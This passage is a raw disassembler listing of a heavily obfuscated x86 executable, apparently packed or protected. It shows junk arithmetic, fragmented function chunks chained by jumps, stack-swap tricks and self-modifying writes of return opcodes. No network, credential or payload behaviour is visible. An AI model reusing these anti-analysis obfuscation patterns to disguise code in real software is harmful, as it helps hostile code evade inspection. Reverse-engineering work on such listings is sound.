loc_44F435: ; CODE XREF: ut7h7i2x:0044A3ECj
jz loc_44B060
; =============== S U B R O U T I N E =======================================
sub_44F43B proc near ; CODE XREF: sub_43FF65+DE93p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043AFC1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D5C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DE82 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00441329 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00444C9F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444FD8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004471AB SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00447544 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00447D3C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044801C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044853B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044A676 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B2EB SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044B4CE SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044BCA5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044D351 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F2D3 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00450D62 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00452373 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453D45 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456958 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456C0D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00457B07 SIZE 0000000B BYTES
xchg esi, [esp+4+var_4]
pop esi
call dword ptr [ebp-4]
test eax, eax
jz loc_44B4CE
jmp loc_456958
sub_44F43B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A0D
loc_44F44F: ; CODE XREF: sub_457A0D-17F82j
; sub_457A0D:loc_443CAEj
push offset loc_441A0E
jmp nullsub_311
; END OF FUNCTION CHUNK FOR sub_457A0D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_44F459: ; CODE XREF: sub_43FF65:loc_445C57j
jz loc_445CD3
push 0B9A4A50Bh
jp loc_4459E3
jmp loc_445CD3
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431E4
loc_44F46F: ; CODE XREF: sub_4431E4:loc_450222j
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz loc_439163
lea eax, [ebp-125h]
push eax
call sub_43CA2D
mov [ebp-4], eax
jmp loc_442E94
; ---------------------------------------------------------------------------
loc_44F490: ; CODE XREF: sub_4431E4+4j
call sub_44CBC2
; END OF FUNCTION CHUNK FOR sub_4431E4
; =============== S U B R O U T I N E =======================================
sub_44F495 proc near ; CODE XREF: ut7h7i2x:0043D37Fj
; sub_456DB3-15271p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043A61A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043D821 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043DA1C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FC27 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004404D7 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044182F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442E99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445AA9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044671B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00447640 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447723 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004494F5 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044A423 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044C25B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D0FF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044F4EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FC2C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044FE6C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045078F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045206D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455A37 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00455D7A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004561D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045951D SIZE 0000001D BYTES
xchg edx, [esp+0]
pop edx
mov [edi], eax
pop edi
lea eax, loc_45078F
jmp loc_447723
sub_44F495 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456B6
loc_44F4A7: ; CODE XREF: sub_4456B6+C712j
call sub_44E261
loc_44F4AC: ; CODE XREF: sub_44917B:loc_448B14j
test al, al
jnz loc_45399E
; END OF FUNCTION CHUNK FOR sub_4456B6
; START OF FUNCTION CHUNK FOR sub_43CFB6
loc_44F4B4: ; CODE XREF: sub_43CFB6+10j
; sub_4544E6-146E1j ...
pop ecx
pop ecx
pop ebp
jmp nullsub_116
; END OF FUNCTION CHUNK FOR sub_43CFB6
; ---------------------------------------------------------------------------
loc_44F4BC: ; CODE XREF: ut7h7i2x:00447463j
jz loc_454E8B
; START OF FUNCTION CHUNK FOR sub_44BDF1
loc_44F4C2: ; CODE XREF: sub_44BDF1:loc_459325j
jmp nullsub_518
; END OF FUNCTION CHUNK FOR sub_44BDF1
; ---------------------------------------------------------------------------
pop ebx
push 307EBEFCh
sbb ecx, 86194213h
jmp loc_454E85
; ---------------------------------------------------------------------------
popf
jmp loc_450D0D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45500F
loc_44F4DE: ; CODE XREF: sub_45500F+13j
jnz loc_453461
jmp loc_44F05D
; END OF FUNCTION CHUNK FOR sub_45500F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_380. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_44F4EA: ; CODE XREF: sub_44F495-7E4Fj
jmp loc_44C25B
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E361
loc_44F4EF: ; CODE XREF: sub_44E361-8569j
jmp sub_43D87A
; END OF FUNCTION CHUNK FOR sub_44E361
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4533DE
loc_44F4F4: ; CODE XREF: sub_4533DE-D7D7j
jmp loc_4415C3
; END OF FUNCTION CHUNK FOR sub_4533DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449957
loc_44F4F9: ; CODE XREF: sub_449957-10484j
jmp sub_44261F
; END OF FUNCTION CHUNK FOR sub_449957
; ---------------------------------------------------------------------------
mov ds:dword_41D170, eax
lea eax, nullsub_514
mov byte ptr [eax], 0C3h
jmp nullsub_514
; ---------------------------------------------------------------------------
push offset sub_445CC3
jmp loc_44B95D
; ---------------------------------------------------------------------------
xchg esi, [edi]
mov edx, [eax]
adc ebp, edi
jmp loc_44ED4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_44F527: ; CODE XREF: sub_447EB5:loc_442F67j
jnb loc_445A4F
; END OF FUNCTION CHUNK FOR sub_447EB5
; START OF FUNCTION CHUNK FOR sub_447718
loc_44F52D: ; CODE XREF: sub_447718+6j
jmp loc_44089F
; END OF FUNCTION CHUNK FOR sub_447718
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44F532: ; CODE XREF: sub_43A556+598Ej
jmp loc_457739
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
add esi, ebx
jmp loc_445A44
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44875F
loc_44F53E: ; CODE XREF: sub_44875F:loc_441D86j
xchg eax, [esp-4+arg_0]
jmp sub_45500F
; END OF FUNCTION CHUNK FOR sub_44875F
; ---------------------------------------------------------------------------
xchg ebx, eax
jmp sub_4594DA
; ---------------------------------------------------------------------------
loc_44F54D: ; DATA XREF: sub_4446B0+8114o
call sub_45499E
mov eax, 6E103E68h
call sub_43AA94
mov ds:off_41D098, eax
lea eax, loc_43C31B
jmp loc_441BFF
; ---------------------------------------------------------------------------
loc_44F56D: ; CODE XREF: ut7h7i2x:00440A73j
test edi, 78EBC8EEh
jmp loc_440026
; ---------------------------------------------------------------------------
loc_44F578: ; CODE XREF: ut7h7i2x:0044DF55j
jp loc_4467FE
; =============== S U B R O U T I N E =======================================
sub_44F57E proc near ; CODE XREF: sub_454047+2p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043C92F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004460DE SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044F713 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453A02 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00454860 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00455069 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004565D7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456D65 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00457883 SIZE 0000001D BYTES
xchg ebx, [esp+0]
pop ebx
xchg eax, [esp-4+arg_0]
jmp loc_454860
sub_44F57E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
or ecx, 0F1D2A692h
or esi, 589C4B5Bh
test ebx, edx
jmp loc_43EFDB
; ---------------------------------------------------------------------------
loc_44F59D: ; CODE XREF: ut7h7i2x:0043E570j
or edi, 77B22973h
sub edi, 0B0D6EE24h
xor edi, 47187CAEh
cmp edi, 61C17F41h
jmp loc_44E605
; ---------------------------------------------------------------------------
and edi, 87E6F6BBh
rol edi, 1
add edi, 9F465157h
add eax, edi
pop edi
mov eax, [eax]
push ecx
jmp loc_453B32
; ---------------------------------------------------------------------------
jmp ds:off_41D0D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A65
loc_44F5D9: ; CODE XREF: sub_443A65:loc_43CB30j
; sub_449C2C+7j ...
jo loc_4419DE
pop edx
mov eax, [esp-8+arg_4]
push edx
jmp loc_4419BB
; END OF FUNCTION CHUNK FOR sub_443A65
; ---------------------------------------------------------------------------
loc_44F5E9: ; CODE XREF: ut7h7i2x:004492DAj
jns loc_44FF79
; START OF FUNCTION CHUNK FOR sub_444273
loc_44F5EF: ; CODE XREF: sub_444273:loc_44619Fj
and edx, 3720F4FBh
xor edx, 0F375F2B8h
add edx, ebp
jmp loc_4546DE
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_44F602: ; CODE XREF: sub_447EB5:loc_444DB7j
push eax
push 0EB45311Fh
xchg esi, [esp+0]
mov eax, esi
pop esi
jmp loc_4542B3
; END OF FUNCTION CHUNK FOR sub_447EB5
; =============== S U B R O U T I N E =======================================
sub_44F613 proc near ; DATA XREF: sub_44E835+7243o
; FUNCTION CHUNK AT 0043933E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D787 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043FEEF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445037 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045379E SIZE 0000000E BYTES
push 0B4FC6220h
and edx, ebp
jmp loc_43933E
sub_44F613 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44F61F: ; DATA XREF: sub_4532D3+6o
mov eax, [ebp-4]
mov [ebp-8], eax
mov eax, [ebp+8]
test byte ptr [eax-8], 10h
jz loc_43B271
jmp loc_449933
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B87B
loc_44F637: ; CODE XREF: ut7h7i2x:00442EF9j
; ut7h7i2x:loc_44D116j ...
push offset loc_44C492
jmp loc_452B8A
; END OF FUNCTION CHUNK FOR sub_44B87B
; ---------------------------------------------------------------------------
loc_44F641: ; CODE XREF: ut7h7i2x:004441E8j
; ut7h7i2x:0044F6B4j
jl loc_43DEE5
loc_44F647: ; CODE XREF: ut7h7i2x:loc_44F6ABj
and eax, 42FCE09Ah
add eax, 0BD4C550Ah
mov [ebp-0Ch], eax
jmp loc_448E53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B58
loc_44F65B: ; CODE XREF: sub_439B58:loc_43BE01j
jl loc_45A4F1
loc_44F661: ; CODE XREF: ut7h7i2x:00455C97j
jmp loc_44B7B3
; END OF FUNCTION CHUNK FOR sub_439B58
; ---------------------------------------------------------------------------
loc_44F666: ; CODE XREF: ut7h7i2x:00442474j
jmp loc_4582DF
; ---------------------------------------------------------------------------
not ecx
push eax
jmp loc_45A4EC
; ---------------------------------------------------------------------------
cmp ebp, 1DD54158h
jmp loc_44B589
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_44F67E: ; CODE XREF: sub_444029:loc_45461Cj
jz loc_4597D6
jmp loc_43BBC5
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
loc_44F689: ; CODE XREF: ut7h7i2x:0043CAEFj
jno loc_445006
add edx, 2063C654h
popf
sub esi, ecx
jmp loc_453D2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F943
loc_44F69D: ; CODE XREF: sub_44F943-ABC9j
test eax, ecx
jmp loc_4424FD
; END OF FUNCTION CHUNK FOR sub_44F943
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_44F6A4: ; CODE XREF: sub_4433C5+EE6Cj
test ebp, edx
jmp loc_43FFDD
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
loc_44F6AB: ; CODE XREF: ut7h7i2x:0043A9E3j
jnz loc_44F647
mov ecx, eax
cdq
jmp loc_44F641
; ---------------------------------------------------------------------------
push ecx
rol ebp, 11h
jmp sub_441894
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4596E5
loc_44F6C2: ; CODE XREF: sub_4596E5:loc_43F70Ej
add eax, 636F73AAh
rol eax, 1
add eax, 2862F123h
push edi
loc_44F6D1: ; CODE XREF: ut7h7i2x:loc_447AD0j
pushf
jmp loc_455193
; END OF FUNCTION CHUNK FOR sub_4596E5
; ---------------------------------------------------------------------------
loc_44F6D7: ; DATA XREF: sub_449D60-7ADEo
mov ds:dword_44A8AC, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455239
loc_44F6DE: ; CODE XREF: sub_455239+10j
jmp sub_44E3B1
; END OF FUNCTION CHUNK FOR sub_455239
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D60
loc_44F6E3: ; CODE XREF: sub_449D60+Fj
rol eax, 19h
push eax
retn
; END OF FUNCTION CHUNK FOR sub_449D60
; ---------------------------------------------------------------------------
loc_44F6E8: ; CODE XREF: ut7h7i2x:00452CFCj
call sub_452D56
jmp loc_44444B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_44F6F2: ; CODE XREF: sub_43D021:loc_43B61Cj
jz loc_456EB1
jmp loc_43FAE2
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_44F6FD: ; CODE XREF: sub_43DBEC:loc_449C6Aj
jl loc_45994D
jmp loc_44388C
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B1E6
loc_44F708: ; CODE XREF: sub_43B1E6:loc_43B1EFj
push offset sub_453E26
jmp nullsub_117
; END OF FUNCTION CHUNK FOR sub_43B1E6
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44F712 proc near ; CODE XREF: sub_459BF0:loc_45829Fj
retn
sub_44F712 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F57E
loc_44F713: ; CODE XREF: sub_44F57E+52EDj
jmp loc_4460DE
; END OF FUNCTION CHUNK FOR sub_44F57E
; ---------------------------------------------------------------------------
loc_44F718: ; CODE XREF: ut7h7i2x:00452533j
sbb ebp, 0B0CB06B2h
; START OF FUNCTION CHUNK FOR sub_44E2E0
loc_44F71E: ; CODE XREF: sub_44E2E0:loc_45250Fj
add edx, 1907E73Fh
call sub_44ED9F
push eax
ror eax, 12h
mov ds:dword_446640, eax
jmp loc_44A66C
; END OF FUNCTION CHUNK FOR sub_44E2E0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44F738 proc near ; CODE XREF: sub_44875F+4j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043C053 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004453EB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044701B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B2CD SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C54E SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044FDA3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451173 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004524B9 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00452A85 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454BB0 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045AB62 SIZE 00000007 BYTES
push ebp
mov ebp, esp
jmp loc_4453EB
sub_44F738 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453A91
loc_44F740: ; CODE XREF: sub_453A91:loc_458FB4j
and ebx, 0F7BFF240h
rol ebx, 3
call sub_441FE1
; END OF FUNCTION CHUNK FOR sub_453A91
; START OF FUNCTION CHUNK FOR sub_452AAF
loc_44F74E: ; CODE XREF: sub_452AAF-95Dj
jmp nullsub_192
; END OF FUNCTION CHUNK FOR sub_452AAF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44F753: ; CODE XREF: sub_43AA94:loc_4427DEj
; ut7h7i2x:loc_446307j
add ebx, 0D319B098h
mov [ebx], eax
push offset loc_457298
jmp nullsub_205
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAA4
loc_44F765: ; CODE XREF: sub_44CAA4:loc_440EC3j
mov eax, offset dword_43E35C
call sub_442252
loc_44F76F: ; CODE XREF: sub_44DF79-6B5Aj
jmp nullsub_118
; END OF FUNCTION CHUNK FOR sub_44CAA4
; =============== S U B R O U T I N E =======================================
sub_44F774 proc near ; CODE XREF: sub_459A71:loc_451831j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00447478 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C02E SIZE 0000001E BYTES
push ebx
mov ebx, edx
xchg ebx, [esp+4+var_4]
call sub_45341C
jmp loc_44C02E
sub_44F774 endp
; ---------------------------------------------------------------------------
loc_44F784: ; CODE XREF: ut7h7i2x:00456364j
jz loc_458C60
jmp loc_459166
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_44F78F: ; CODE XREF: sub_4408C2+26EBj
adc ebx, 0F84E10FFh
jmp loc_43DB89
; ---------------------------------------------------------------------------
loc_44F79A: ; CODE XREF: sub_4408C2+4j
cmp dword ptr [ebp-4], 1
jnz loc_43DB89
jmp loc_44CEF0
; END OF FUNCTION CHUNK FOR sub_4408C2
; =============== S U B R O U T I N E =======================================
sub_44F7A9 proc near ; CODE XREF: ut7h7i2x:0043EC11j
; ut7h7i2x:0044DE4Fp
arg_0 = dword ptr 4
xchg ecx, [esp+0]
pop ecx
push 3BC00618h
pop edi
sub edi, 0DCCEC7D7h
and edi, 538646E0h
add edi, 0ADC41061h
loc_44F7C5: ; CODE XREF: ut7h7i2x:0044454Aj
xchg edi, [esp-4+arg_0]
jmp loc_43E521
sub_44F7A9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442987
loc_44F7CD: ; CODE XREF: sub_442987:loc_44CF57j
; ut7h7i2x:0044CF7Fj
add ebx, 391A2D82h
add ebx, ebp
add ebx, 44E54479h
push offset loc_457667
jmp nullsub_300
; END OF FUNCTION CHUNK FOR sub_442987
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_44F7E5: ; CODE XREF: sub_444A12+7A52j
; sub_444A12:loc_44D006j
call loc_453D96
; END OF FUNCTION CHUNK FOR sub_444A12
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_44F7EA: ; CODE XREF: sub_44E2C4:loc_44FC43j
; ut7h7i2x:0045A4E7j
add eax, 66108595h
xchg eax, [esp+4+var_4]
jmp loc_43FD63
; END OF FUNCTION CHUNK FOR sub_44E2C4
; =============== S U B R O U T I N E =======================================
sub_44F7F8 proc near ; CODE XREF: sub_43F015j
; ut7h7i2x:loc_456563j
; FUNCTION CHUNK AT 00439859 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045040F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045996C SIZE 00000005 BYTES
pop edx
and edx, 0F79BF2CDh
or edx, 0DC6B716Eh
jnz loc_439859
loc_44F80B: ; CODE XREF: ut7h7i2x:0044EABEj
jmp loc_45040F
sub_44F7F8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_44F810: ; CODE XREF: sub_44A3BB-20BCj
jmp loc_459A05
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
loc_44F815: ; CODE XREF: ut7h7i2x:00445E88j
jmp locret_448361
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44070C
loc_44F81A: ; CODE XREF: sub_44070C+9j
jmp nullsub_120
; END OF FUNCTION CHUNK FOR sub_44070C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_44F81F: ; CODE XREF: sub_4549F0-14922j
; ut7h7i2x:loc_444D20j
shr edx, 8
jmp sub_459772
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445DB4
loc_44F827: ; CODE XREF: sub_445DB4+13A75j
xchg ebp, [esp-4+arg_0]
mov ebx, ebp
pop ebp
xchg edi, [esp-4+arg_0]
mov ebp, edi
pop edi
jmp loc_44E6F1
; ---------------------------------------------------------------------------
loc_44F838: ; CODE XREF: sub_445DB4+Cj
sub eax, ebx
shr edx, 1Bh
jmp loc_45574B
; END OF FUNCTION CHUNK FOR sub_445DB4
; ---------------------------------------------------------------------------
pop edx
mov eax, [esp]
push ebp
mov ebp, edx
xchg ebp, [esp]
push edi
jmp loc_451E02
; =============== S U B R O U T I N E =======================================
sub_44F852 proc near ; CODE XREF: sub_454466-105C9j
; sub_4442CC:loc_452A55j
push ebx
push 0AB20FA8Ch
pop ebx
and ebx, ds:4000F6h
add ebx, 0F44F3E8Eh
and ebx, 39954043h
sub_44F852 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44F86B: ; CODE XREF: sub_43A556+FD14j
xor ebx, 15BCF889h
sub eax, ebx
jmp loc_43DE44
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_44F878: ; CODE XREF: ut7h7i2x:loc_4592CCj
pop ebx
or ebx, 23C78D60h
add ebx, 184D3C29h
push offset sub_450987
jmp locret_45770C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_44F88F: ; CODE XREF: sub_44A3BB+BBF2j
sub edi, 30045E88h
popf
jmp loc_44DB09
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44F89B: ; CODE XREF: sub_439BF8:loc_44344Fj
div ecx
push edi
push 0E7779FFh
pop edi
add edi, 7E477FE5h
rol edi, 13h
add edi, 0DFA73520h
jmp loc_449F18
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_44F8B8: ; CODE XREF: ut7h7i2x:00451148j
push offset sub_44E5D0
jmp loc_44DE7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EB8A
loc_44F8C2: ; CODE XREF: sub_43EB8A+Fj
and esi, 7AC22B77h
xor esi, 37C56F5Dh
xor eax, esi
pop esi
loc_44F8D1: ; CODE XREF: ut7h7i2x:0045286Aj
jmp loc_4593B8
; END OF FUNCTION CHUNK FOR sub_43EB8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442AD1
loc_44F8D6: ; CODE XREF: sub_442AD1:loc_4411DCj
jl loc_458C77
loc_44F8DC: ; CODE XREF: sub_453303+9j
jmp loc_439374
; END OF FUNCTION CHUNK FOR sub_442AD1
; ---------------------------------------------------------------------------
adc ecx, 0E433694Eh
adc esi, edx
xor edi, ecx
jmp loc_4561BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AA33
loc_44F8F0: ; CODE XREF: sub_44AA33-8016j
adc esi, edi
rol ebx, 5
shl ebp, 0Ah
or ebp, 3A8B7402h
loc_44F8FE: ; CODE XREF: sub_44AA33:loc_442A16j
rol edx, 1Bh
jmp loc_44D98E
; END OF FUNCTION CHUNK FOR sub_44AA33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_44F906: ; CODE XREF: sub_4544E6-10602j
jns nullsub_318
rol ecx, 1Ah
jnz loc_44E240
shl edx, 1Bh
jmp loc_458442
; END OF FUNCTION CHUNK FOR sub_4544E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44F91D: ; CODE XREF: sub_43A556+11B7Dj
rol eax, 1Ah
xor eax, 4ACF2A1Ah
add eax, ebp
add eax, 5ACF3851h
mov eax, [eax]
push edx
jmp loc_443DF7
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_44F936: ; CODE XREF: sub_441765+AAC2j
jg loc_43B966
cmp eax, ecx
jmp loc_4539E1
; END OF FUNCTION CHUNK FOR sub_441765
; =============== S U B R O U T I N E =======================================
sub_44F943 proc near ; CODE XREF: ut7h7i2x:0043E4FFp
; FUNCTION CHUNK AT 00440FB8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004424FD SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004432A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444D78 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004450C6 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004451C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F69D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00452DD2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A29B SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
cmp dword ptr [ebp-4], 0
jz loc_44A5B7
jmp loc_440FB8
sub_44F943 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_44F956: ; CODE XREF: sub_457A66-134B5j
sub ebx, edi
rol edx, 6
adc edx, 9A31CBF8h
jmp loc_43EBFE
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_44F966: ; CODE XREF: sub_44602A+535Ej
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
jmp loc_43AE03
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449EE1
loc_44F972: ; CODE XREF: sub_449EE1:loc_4449FEj
lea eax, sub_449EE1
mov byte ptr [eax], 0C3h
jmp sub_449EE1
; ---------------------------------------------------------------------------
loc_44F980: ; CODE XREF: sub_449EE1+1j
mov eax, [esp-4+arg_0]
push esi
jmp loc_44AAB8
; END OF FUNCTION CHUNK FOR sub_449EE1
; ---------------------------------------------------------------------------
mov esi, ebx
jmp sub_444374
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_44F990: ; CODE XREF: sub_44B5CF:loc_44E922j
mov esi, edi
xchg esi, [esp+4+var_4]
mov edi, ebp
xchg edi, [esp+4+var_4]
mov ebp, esp
jmp loc_454FC3
; END OF FUNCTION CHUNK FOR sub_44B5CF
; =============== S U B R O U T I N E =======================================
sub_44F9A1 proc near ; CODE XREF: ut7h7i2x:0043C89Ej
; sub_457818-128DBp
; FUNCTION CHUNK AT 0043DEDF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B749 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451AEF SIZE 0000000D BYTES
xchg ebx, [esp+0]
pop ebx
sub eax, 0F3EBB8E8h
xor eax, 0E36B5683h
add eax, 0B5D991F4h
xor eax, 167BADEFh
